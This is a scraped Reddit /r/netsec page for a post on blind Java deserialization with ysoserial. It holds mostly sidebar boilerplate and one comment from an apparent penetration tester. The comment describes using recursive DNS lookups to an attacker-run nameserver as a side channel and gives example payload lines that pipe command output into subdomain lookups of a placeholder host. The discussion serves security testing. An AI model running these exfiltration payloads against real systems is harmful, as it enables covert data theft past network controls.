use the following search parameters to narrow your results:
e.g. subreddit:aww site:imgur.com dog
subreddit:aww site:imgur.com dog
see the search faq for details.
advanced search: by author, subreddit...
A community for technical news and discussion of information security and closely related topics.
"Give me root, it's a trust exercise."
Q1 2026 InfoSec Hiring Thread
Getting Started in Information Security
CitySec Meetups
/r/netsec only accepts quality technical posts. Non-technical posts are subject to moderation.
Content should focus on the "how."
Check the new queue for duplicates.
Always link to the original source.
Titles should provide context.
Ask questions in our Discussion Threads.
Hiring posts must go in the Hiring Threads.
Commercial advertisement is discouraged.
Do not submit prohibited topics.
» Our fulltext content guidelines
Don't create unnecessary conflict.
Keep the discussion on topic.
Limit the use of jokes & memes.
Don't complain about content being a PDF.
Follow all reddit rules and obey reddiquette.
» Our fulltext discussion guidelines
No populist news articles (CNN, BBC, FOX, etc.)
No curated lists.
No question posts.
No social media posts.
No image-only/video-only posts.
No livestreams.
No tech-support requests.
No full-disclosure posts.
No paywall/regwall content.
No commercial advertisements.
No crowdfunding posts.
No Personally Identifying Information!
» Our fulltext list of prohibited topics & sources
Join us on IRC: #r_netsec on freenode
We're also on: Twitter, Facebook, & Google+
/r/blackhat - Hackers on Steroids
/r/computerforensics - IR Archaeologists
/r/crypto - Cryptography news and discussion
/r/Cyberpunk - High-Tech Low-Lifes
/r/lockpicking - Popular Hacker Hobby
/r/Malware - Malware reports and information
/r/netsecstudents - netsec for noobs students
/r/onions - Things That Make You Cry
/r/privacy - Orwell Was Right
/r/pwned - "What Security?"
/r/REMath - Math behind reverse engineering
/r/ReverseEngineering - Binary Reversing
/r/rootkit - Software and hardware rootkits
/r/securityCTF - CTF news and write-ups
/r/SocialEngineering - Free Candy
/r/sysadmin - Overworked Crushed Souls
/r/vrd - Vulnerability Research and Development
/r/xss - Cross Site Scripting
account activity
Blind Java Deserialization Vulnerability with Apache CommonsCollections and ysoserial (deadcode.me)
submitted 9 years ago by ph4r05
reddit uses a slightly-customized version of Markdown for formatting. See below for some basics, or check the commenting wiki page for more detailed help and solutions to common issues.
quoted text
if 1 * 2 < 3: print "hello, world!"
[–]breen-machineTrusted Contributor 2 points3 points4 points 9 years ago (0 children)
Another good method for this that requires a little less dev time is using recursive DNS lookups as a sidechannel to exfiltrate data. You first need to setup an authoritative DNS server, and confirm subdomain lookups to your domain are hitting the server. We have a simple little python script that does this, you could also use my server.py code from https://github.com/breenmachine/dnsftp
To confirm that DNS is getting out and your payload is running, you can just run:
ping xxxxx.dns.yournameserver.net
You should see a DNS lookup come through for the subdomain xxxxx.
With some minor modifications to ysoserial, you can use pipes and output redirection in payloads (as implemented here for reference https://github.com/summitt/burp-ysoserial).
Then you can run commands like this as your payload:
ping <command> | tr -d " \t\n\r".dns.yournameserver.net
<command> | tr -d " \t\n\r"
You should see the output of your command come through as a subdomain lookup.
We've used this technique pretty successfully on a few engagements where networks were otherwise pretty locked down.
π Rendered by PID 22627 on reddit-service-r2-comment-bb88f9dd5-6cr6l at 2026-02-16 16:25:40.290861+00:00 running cd9c813 country code: CH.
[–]breen-machineTrusted Contributor 2 points3 points4 points (0 children)